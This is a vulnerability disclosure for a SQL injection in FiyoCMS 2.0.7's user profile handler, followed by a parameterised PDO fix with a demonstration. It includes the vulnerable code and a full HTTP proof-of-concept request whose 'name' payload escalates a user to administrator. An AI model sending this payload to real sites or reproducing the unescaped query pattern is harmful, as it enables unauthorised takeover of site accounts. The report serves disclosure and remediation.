Good day.
I found an update-type SQL injection vulnerability in FiyoCMS 2.0.7. This vulnerability can lead to normal user privileges being elevated to administrator privileges.
The vulnerability lies in /apps/app_user/sys_user.php:
```php
if(isset($_POST['edit'])){
    // Only a loose format check on the e-mail; nothing here escapes SQL metacharacters
    if(!empty($_POST['email']) AND @ereg("^.+@.+\\..+$",$_POST['email']))
    {
        $qrq = false;
        $_POST['bio'] = htmlentities($_POST['bio']);
        if(empty($_POST['password']) AND empty($_POST['kpassword'])){
            // name and email are interpolated into the UPDATE statement unescaped
            $qrq=$db->update(FDBPrefix.'user',array(
                "name"=>"$_POST[name]",
                "email"=>"$_POST[email]",
                "about"=>"$_POST[bio]"),
                "id=$_SESSION[USER_ID]");
        }
        // (rest of the handler not shown in the report)
    }
}
```
It can be noticed that these two parameters, $_POST[name] and $_POST[email], are taken directly into the database query.
PoC:
```http
POST /www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit HTTP/1.1
Host: 127.0.0.1
Content-Length: 139
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15f6d54e23f539-0723e5e4ddab84-5c153e17-100200-15f6d54e240a17; CNZZDATA1260798858=709893868-1509454193-http%253A%252F%252F127.0.0.1%252F%7C1509803835; PHPSESSID=8d82fdb9a681a4b55ed56fcf8df8fe42
Connection: close

password=&kpassword=&name=xm001",`email`="xxxx@gmail.com",`about`="test",level=1 WHERE id=2%23&email=xxxxx%40gmail.com&bio=wers&edit=Simpan
```
Then you can get into the backstage.
I hope you can fix it as soon as possible. If there are any questions, please send the details to my email at xm001test@gmail.com.
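As an added example (not FiyoCMS code and not part of the report above), here is how the same profile update can be written so that column names come from a fixed allowlist and every value is a bound parameter. The table name, the editable column set and the helper name `updateOwnProfile` are assumptions made for this illustration; it runs stand-alone against an in-memory SQLite database through PDO, and feeds the PoC's `name` payload through the hardened path to show that the privilege column stays untouched.

```php
<?php
// Added example, not FiyoCMS code: parameterised replacement for the string-built
// UPDATE in the report. Table name, column list and helper names are assumptions.
declare(strict_types=1);

const PROFILE_TABLE = 'fiyo_user';   // assumed table name (stands in for FDBPrefix.'user')

// Only these columns may be changed by a self-service profile edit. The privilege
// column ("level", which the PoC overwrites) is deliberately not in the list.
const PROFILE_EDITABLE = ['name', 'email', 'about'];

/**
 * Update the caller's own row. Column names are taken from the allowlist, never
 * from the request, and values are bound, so quotes or a trailing WHERE in the
 * submitted data cannot change the statement's structure.
 */
function updateOwnProfile(PDO $db, int $userId, array $fields): int
{
    $set = [];
    $params = [':id' => $userId];
    foreach ($fields as $column => $value) {
        if (!in_array($column, PROFILE_EDITABLE, true)) {
            throw new InvalidArgumentException("column not editable: $column");
        }
        $set[] = "`$column` = :$column";
        $params[":$column"] = $value;
    }
    if ($set === []) {
        return 0;
    }
    $sql = 'UPDATE `' . PROFILE_TABLE . '` SET ' . implode(', ', $set) . ' WHERE `id` = :id';
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->rowCount();
}

// --- Self-contained demonstration on an in-memory SQLite database ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE `' . PROFILE_TABLE . '` '
        . '(id INTEGER PRIMARY KEY, name TEXT, email TEXT, about TEXT, level INTEGER)');
$db->exec('INSERT INTO `' . PROFILE_TABLE . "` VALUES (2, 'user', 'user@example.com', '', 5)");

// Constructed input mirroring the PoC's name parameter; with binding it is only a string.
$hostile = 'xm001",`email`="x@example.com",`about`="t",level=1 WHERE id=2#';
updateOwnProfile($db, 2, ['name' => $hostile, 'email' => 'user@example.com', 'about' => 'hi']);

$row = $db->query('SELECT name, level FROM `' . PROFILE_TABLE . '` WHERE id = 2')
          ->fetch(PDO::FETCH_ASSOC);
if ((int) $row['level'] !== 5) {
    throw new RuntimeException('privilege column was modified');
}
if ($row['name'] !== $hostile) {
    throw new RuntimeException('payload was not stored as a literal string');
}
echo "profile updated; level unchanged and name stored literally\n";

// A request that tries to set "level" through the profile form is refused outright.
try {
    updateOwnProfile($db, 2, ['level' => 1]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The two properties worth checking in any fix for this class of bug are visible in the demonstration: the privilege column cannot be reached from the profile form at all, and the attacker-controlled text ends up as data rather than as part of the statement. Escaping alone would cover the second point but not the first.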